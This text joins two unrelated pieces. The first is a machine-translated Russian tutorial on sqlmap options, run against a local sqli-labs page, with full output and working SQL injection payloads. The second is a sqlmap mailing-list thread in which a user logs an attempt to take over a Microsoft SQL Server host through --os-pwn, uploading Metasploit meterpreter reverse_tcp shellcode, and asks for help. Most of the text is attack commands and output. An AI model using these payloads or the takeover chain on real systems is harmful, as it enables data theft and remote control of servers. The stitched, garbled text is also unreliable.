Этот параметр используется для указания технологии, используемой при обнаружении внедрения. По умолчанию Sqlmap будет использовать все технологии, которые он поддерживает для обнаружения;
За этим параметром следуют заглавные буквы, обозначающие технологию обнаружения, и его значение — B, E, U, S, T или Q, и его значение выглядит следующим образом:
- B: слепой на основе логических значений (логическая инъекция)
- E: на основе ошибок (внедрение ошибок)
- U: объединение на основе запроса (внедрение совместного запроса)
- S: составные запросы (внедрение запроса с несколькими операторами)
- T: слепой по времени (на основе впрыска с временной задержкой)
- Q: Встроенные запросы (внедрение вложенных запросов)
Например:
можно использовать–technique ESУказать использование двух методов обнаружения;
–technique BEUSTQЭквивалентно значению по умолчанию.
Тест логической инъекции:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique B --current-db
Распечатать
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:01:28 /2020-03-01/
[11:01:28] [INFO] testing connection to the target URL
[11:01:29] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:01:29] [INFO] testing if the target URL content is stable
[11:01:29] [INFO] target URL content is stable
[11:01:29] [INFO] testing if GET parameter 'id' is dynamic
[11:01:29] [INFO] GET parameter 'id' appears to be dynamic
[11:01:29] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:01:29] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[11:01:29] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[11:01:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:01:35] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[11:01:35] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 17 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 7837=7837 AND ('Inoj'='Inoj
---
[11:01:38] [INFO] testing MySQL
[11:01:38] [INFO] confirming MySQL
[11:01:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[11:01:38] [INFO] fetching current database
[11:01:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:01:38] [INFO] retrieved: security
current database: 'security'
[11:01:39] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 11:01:39 /2020-03-01/
Очевидно, что в настоящее время тип является только слепым на основе логических значений.
2. sqlmap устанавливает время задержки слепого впрыска
параметр:
–time-sec
Используйте этот параметр, чтобы установить время задержки на основе введения временной задержки, по умолчанию — 5 секунд.
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --current-db --time-sec 3
Распечатать
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:06:57 /2020-03-01/
[11:06:57] [INFO] testing connection to the target URL
[11:06:57] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:06:57] [INFO] testing if the target URL content is stable
[11:06:58] [INFO] target URL content is stable
[11:06:58] [INFO] testing if GET parameter 'id' is dynamic
[11:06:58] [INFO] GET parameter 'id' appears to be dynamic
[11:06:58] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:06:58] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[11:06:58] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[11:07:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:07:06] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[11:07:06] [INFO] testing 'Generic inline queries'
[11:07:06] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:07:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:07:06] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:07:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:07:06] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:07:06] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:07:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:07:06] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[11:07:06] [INFO] testing 'MySQL inline queries'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:07:06] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:07:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[11:07:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:07:13] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:07:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:07:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:07:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:07:13] [INFO] target URL appears to have 3 columns in query
[11:07:13] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 1324=1324 AND ('QGoK'='QGoK
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1') AND (SELECT 4928 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(4928=4928,1))),0x716a6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('LiLq'='LiLq
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 9581 FROM (SELECT(SLEEP(3)))pIsh) AND ('YbSn'='YbSn
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-2335') UNION ALL SELECT NULL,NULL,CONCAT(0x71707a6b71,0x6f74417665587859716869647543466d4c486e59584d504148467673707957736957435651565950,0x716a6a7071)-- -
---
[11:07:45] [INFO] the back-end DBMS is MySQL
[11:07:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[11:07:45] [INFO] fetching current database
current database: 'security'
[11:07:45] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 11:07:45 /2020-03-01/
Есть параграф
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 9581 FROM (SELECT(SLEEP(3)))pIsh) AND ('YbSn'='YbSn
SELECT(SLEEP(3))То есть оператор select задерживается на 3 секунды.
3. sqlmap устанавливает количество полей объединения
При выполнении совместной инъекции запроса Sqlmap автоматически определяет количество столбцов в диапазоне от 1 до 10;
Когда значение уровня выше, верхний предел диапазона обнаружения количества столбцов будет расширен до 50.
Параметры:
--union-cols
Этот параметр можно использовать для указания диапазона обнаружения количества столбцов, например--union-cols 12-16Это сделает диапазон обнаружения количества столбцов Sqlmap от 12 до 16.
для проверки:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique U --current-db -v 3 --union-cols 12-18
дисплей:
union-cols
4. sqlmap устанавливает символ объединения
параметр:
–union-char
По умолчанию Sqlmap использует нулевые символы (NULL) при выполнении совместной инъекции запроса.
Но когда значение уровня высокое, Sqlmap будет генерировать случайные числа для совместной инъекции запроса, потому что иногда использование инъекции нулевого символа дает сбой, а использование случайных чисел будет успешным.
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique U --current-db -v 3 --union-cols 12-18 --level 3 --union-char 123
дисплей:
union-char
5. sqlmap устанавливает таблицу запросов на объединение
параметр:
–union-from
В некоторых случаях в объединенном запросе необходимо указать допустимое и доступное имя таблицы, иначе объединенный запрос завершится ошибкой.
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique U --current-db -v 3 --union-cols 12-18 --level 3 --union-char 123 --union-from users
дисплей:
union-from
6. распознавание отпечатков пальцев sqlmap
Обнаружение информации об отпечатке пальца цели:
Параметры:
-fили же--fingerprint
Использование и функция параметра и--bannerаналогичный.
для проверки:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 -f
Распечатать
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:31:12 /2020-03-01/
[12:31:13] [INFO] testing connection to the target URL
[12:31:13] [INFO] testing if the target URL content is stable
[12:31:13] [INFO] target URL content is stable
[12:31:13] [INFO] testing if GET parameter 'id' is dynamic
[12:31:13] [INFO] GET parameter 'id' appears to be dynamic
[12:31:13] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:31:13] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[12:31:13] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[12:31:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:31:40] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[12:31:40] [INFO] testing 'Generic inline queries'
[12:31:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:31:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:31:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:31:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:31:40] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:31:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:31:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:31:40] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:31:40] [INFO] testing 'MySQL inline queries'
[12:31:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:31:40] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:31:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:31:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:31:51] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:31:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:31:51] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:31:51] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:31:51] [INFO] target URL appears to have 3 columns in query
[12:31:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 1945=1945 AND ('oLHz'='oLHz
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1') AND (SELECT 6730 FROM(SELECT COUNT(*),CONCAT(0x716a6a7171,(SELECT (ELT(6730=6730,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('IlMq'='IlMq
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 1477 FROM (SELECT(SLEEP(5)))GkLS) AND ('Wwjt'='Wwjt
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4873') UNION ALL SELECT NULL,CONCAT(0x716a6a7171,0x45744c655268474b765270526d476a6a574a6d53776b4c637753784d664c6544774d766e664a5950,0x716a786a71),NULL-- -
---
[12:31:54] [INFO] testing MySQL
[12:31:54] [INFO] confirming MySQL
[12:31:54] [INFO] the back-end DBMS is MySQL
[12:31:54] [INFO] actively fingerprinting MySQL
[12:31:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:31:55] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.26
html error message fingerprint: MySQL
[12:31:55] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 12:31:55 /2020-03-01/
показаноactive fingerprint, Который показывает основную информацию о базе данных.
-
Summary
-
Files
-
Reviews
-
Support
-
Mailing Lists
-
External Link ▾
- Donate
- Browse SVN
Menu
▾
▴
|
From: Peter Laboratra <mypen…@gm…> — 2015-07-02 07:13:56 |
Hi,
Thanks for your reply.
This time I tried with --fresh-queries without specific --techniques.
why am I getting error "page not found (404)" again and again? Does it
indicate that file is being written but is deleted by Anti-Virus control or
something and that's why while calling the uploaded file 404 error is
appearing, Can this be the case ? Need your opinion and expertise.
Thanks
--start---
root@kali:~# sqlmap -r mytarget_login -p testNumber --os-pwn
--msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf8 -v 2 --fresh-queries
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
[11:12:52] [DEBUG] executing local command:
/opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
EXITFUNC=process LPORT=20652 LHOST=192.168.1.8 R |
/opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o
"/root/.sqlmap/output/myexample.com/tmpmwjvg" -t raw BufferRegister=EAX
[11:12:52] [INFO] creation in progress .................. done
[11:13:10] [DEBUG] the shellcode size is 308 bytes
[11:13:10] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft
SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ/tmpsewjvg.exe'
[11:13:10] [DEBUG] going to upload the binary file with stacked query SQL
injection technique
[11:13:10] [INFO] using PowerShell to write the binary file content to file
'D:Program FilesMicrosoft SQL
ServerMSSQ^10.MSSQLSERVERMSSQLaLoĀtmpsewjvg.exe'
[11:13:10] [DEBUG] uploading the base64-encoded file to D:Program
FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLoĀtmpfyort.txt,
please wait..
[11:13:12] [DEBUG] uploading the PowerShell base64-decoding script to
D:Program FilesMicrosoft SQL
ServerMSSQ^10.MSSQLSERVERMSSQLaLoĀtmppsfpoc.ps1
[11:13:12] [DEBUG] executing the PowerShell base64-decoding script to write
the D:Program FilesMicrosoft SQL
ServerMSSQ^10.MSSQLSERVERMSSQLaLoĀtmpsewjvg.exe file, please wait..
[11:13:12] [WARNING] if you experience problems with non-ASCII identifier
names you are advised to rerun with '--tamper=charunicodeencode'
[11:13:12] [DEBUG] checking the length of the remote file D:Program
FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLoĀtmpsewjvg.exe
[11:13:12] [INFO] retrieved:
[11:13:13] [DEBUG] performed 3 queries in 0.37 seconds
[11:13:13] [WARNING] it looks like the file has not been written (usually
occurs if the DBMS process' user has no write privileges in the destination
path)
do you want to try to upload the file with the custom Visual Basic script
technique? [Y/n] y
[11:13:15] [INFO] using a custom visual basic script to write the binary
file content to file 'D:Program FilesMicrosoft SQL
ServerMSSQ^10.MSSQLSERVERMSSQLaLoĀtmpsewjvg.exe', please wait..
[11:13:15] [DEBUG] uploading the file base64-encoded content to D:Program
FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLoĀtmpfzlhn.txt,
please wait..
[11:13:16] [CRITICAL] page not found (404)
[11:13:16] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[11:13:16] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that
some kind of protection is involved (e.g. WAF)
[*] shutting down at 11:13:16
--end---
On Thu, Jul 2, 2015 at 3:56 AM, Miroslav Stampar <miros...@gm...
> wrote:
> Hi.
>
> 1) First of all, please don't restrain sqlmap to only use "stacked" SQLi.
> That way you'll kill the possibility to get perfectly valid results with
> other techniques
> 2) In current state, you've got some "trashy" characters (because of
> combination of laggy connection and stacked SQLi), like: "D:/Program
> Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use
> --fresh-queries in such situations (once per run where you expect resume of
> trashy chars) to force sqlmap to try to retrieve the problematic value once
> again.
>
> Bye
>
> On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <mypen...@gm...>
> wrote:
>
>> Hi All,
>>
>> In first phase of our test we discovered Target URL is vulnerable and we
>> managed to retrieved lots of information such as --users, --dbs, some of
>> --tables and lots more. All this retrieval was very slow probably due to
>> time-based vulnerability; however tried through all (BEUSTQ) and found same
>> state.
>>
>> During an attempt after few days of our success we noticed some of the
>> parameter is not working and we are receiving errors like for instance
>> during requery for --users we received error "[09:39:23] [CRITICAL] unable
>> to retrieve the number of database users". During requery for -U sa
>> --passwords we received "unnable to retrieve the password hashes for the
>> database users (probably because the session user has no read privileges
>> over the relevant system database table)".
>>
>> We moved to OS takeover, initially get error for xp_cmdshell however
>> activated and confirmed using SQLNinja and moved on to get --os-shell,
>> executed some of commands like "hostname", "whoami" and successfully
>> retrieved its output.
>>
>> Now after few minutes we noted that we are not getting any output of any
>> command with message "No output".
>>
>> We moved to --os-pwn + --msf-path, But again with no success on
>> meterpreter or VNC.
>> received error "HTTP error codes detected during run:
>> 404 (Not Found) - 1 times"
>>
>> I'm attaching screen log, please help me with this if thr is any scope
>> available.
>> Thanks in Advance.
>>
>>
>>
>> -------screen logs start-------
>>
>> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S
>> --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t
>> test_msf7 -v 2
>> _
>> ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150519}
>> |_ -| . | | | .'| . |
>> |___|_ |_|_|_|_|__,| _|
>> |_| |_| http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
>> mutual consent is illegal. It is the end user's responsibility to obey all
>> applicable local, state and federal laws. Developers assume no liability
>> and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 10:03:33
>>
>> mytarget_login
>> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
>> [10:03:33] [DEBUG] not a valid WebScarab log data
>> [10:03:33] [DEBUG] cleaning up configuration parameters
>> test_msf7
>> mytarget_login
>> /opt/metasploit/apps/pro/msf3
>> [10:03:33] [INFO] setting file for logging HTTP traffic
>> [10:03:33] [DEBUG] setting the HTTP timeout
>> [10:03:33] [DEBUG] creating HTTP requests opener object
>> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value
>> [10:03:33] [DEBUG] setting the takeover out-of-band functionality
>> [10:03:33] [DEBUG] provided Metasploit Framework path
>> '/opt/metasploit/apps/pro/msf3' is valid
>> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the
>> Cookie
>> [10:03:33] [DEBUG] resolving hostname 'mytarget.com'
>> [10:03:33] [INFO] testing connection to the target URL
>> [10:03:48] [DEBUG] declared web page charset 'utf-8'
>> sqlmap got a 302 redirect to '
>> https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to
>> follow? [Y/n] Y
>> redirect is a result of a POST request. Do you want to resend original
>> POST data to a new location? [Y/n] Y
>> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection
>> reset by peer')
>> [10:03:56] [DEBUG] heuristically checking if the target is protected by
>> some kind of WAF/IPS/IDS
>> sqlmap identified the following injection points with a total of 0
>> HTTP(s) requests:
>> ---
>> Parameter: testNumber (POST)
>> Type: stacked queries
>> Title: Microsoft SQL Server/Sybase stacked queries
>> Payload:
>> example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333';
>> WAITFOR DELAY '0:0:5'--&testPassword=3243
>> Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
>> ---
>> [10:03:56] [INFO] testing Microsoft SQL Server
>> [10:03:56] [INFO] confirming Microsoft SQL Server
>> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
>> back-end DBMS: Microsoft SQL Server 2008
>> how do you want to establish the tunnel?
>> [1] TCP: Metasploit Framework (default)
>> [2] ICMP: icmpsh - ICMP tunneling
>> > 1
>> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL
>> Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā as temporary files directory
>> [10:04:00] [INFO] testing if current user is DBA
>> [10:04:00] [DEBUG] creating a support table to write commands standard
>> output to
>> [10:04:00] [WARNING] time-based comparison requires larger statistical
>> model, please wait..............................
>> [10:04:04] [WARNING] it is very important not to stress the network
>> adapter during usage of time-based payloads to prevent potential errors
>> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
>> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
>> [10:04:04] [WARNING] in case of continuous data retrieval problems you
>> are advised to try a switch '--no-cast' or switch '--hex'
>> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output
>> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
>> which connection type do you want to use?
>> [1] Reverse TCP: Connect back from the database host to this machine
>> (default)
>> [2] Reverse TCP: Try to connect back from the database host to this
>> machine, on all ports example3ween the specified and 65535
>> [3] Reverse HTTP: Connect back from the database host to this machine
>> tunnelling traffic over HTTP
>> [4] Reverse HTTPS: Connect back from the database host to this machine
>> tunnelling traffic over HTTPS
>> [5] Bind TCP: Listen on the database host for a connection
>> > 1
>> what is the local address? [192.168.1.8]
>> which local port number do you want to use? [61371]
>> which payload do you want to use?
>> [1] Meterpreter (default)
>> [2] Shell
>> [3] VNC
>> > 1
>> [10:04:17] [DEBUG] executing local command:
>> /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
>> EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R |
>> /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/aMQha_mixed -o
>> "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
>> [10:04:17] [INFO] creation in progress .................. done
>> [10:04:35] [DEBUG] the shellcode size is 308 bytes
>> [10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft
>> SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā/tmpsebykt.exe'
>> [10:04:35] [DEBUG] going to upload the binary file with stacked query SQL
>> injection technique
>> [10:04:35] [INFO] using PowerShell to write the binary file content to
>> file 'D:Program FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLo
>> Ātmpsebykt.exe'
>> [10:04:35] [DEBUG] uploading the base64-encoded file to D:Program
>> FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLo Ātmpfidjf.txt,
>> please wait..
>> [10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to
>> D:Program FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLo
>> Ātmppsbcbi.ps1
>> [10:04:36] [DEBUG] executing the PowerShell base64-decoding script to
>> write the D:Program FilesMicrosoft SQL
>> ServerMSSQ^10.MSSQLSERVERMSSQLaLo Ātmpsebykt.exe file, please wait..
>> [10:04:37] [WARNING] if you experience problems with non-ASCII identifier
>> names you are advised to rerun with '--tamper=charunicodeencode'
>> [10:04:37] [DEBUG] checking the length of the remote file D:Program
>> FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLo Ātmpsebykt.exe
>> [10:04:37] [INFO] retrieved:
>> [10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
>> [10:04:37] [WARNING] it looks like the file has not been written (usually
>> occurs if the DBMS process' user has no write privileges in the destination
>> path)
>> do you want to try to upload the file with the custom Visual Basic script
>> technique? [Y/n] Y
>> [10:04:41] [INFO] using a custom visual basic script to write the binary
>> file content to file 'D:Program FilesMicrosoft SQL
>> ServerMSSQ^10.MSSQLSERVERMSSQLaLo Ātmpsebykt.exe', please wait..
>> [10:04:41] [DEBUG] uploading the file base64-encoded content to
>> D:Program FilesMicrosoft SQL ServerMSSQ^10.MSSQLSERVERMSSQLaLo
>> Ātmpfegab.txt, please wait..
>> [10:04:41] [CRITICAL] page not found (404)
>> [10:04:41] [WARNING] HTTP error codes detected during run:
>> 404 (Not Found) - 1 times
>> [10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean
>> that some kind of protection is involved (e.g. WAF)
>>
>> [*] shutting down at 10:04:41
>>
>> root@kali:~#
>>
>>
>> -------screen logs end-------
>>
>>
>> Please help!!
>>
>>
>>
>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Don't Limit Your Business. Reach for the Cloud.
>> GigeNET's Cloud Solutions provide you with the tools and support that
>> you need to offload your IT needs and focus on growing your business.
>> Configured For All Businesses. Start Your Cloud Today.
>> https://www.gigenetcloud.com/
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlma...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
|
View entire thread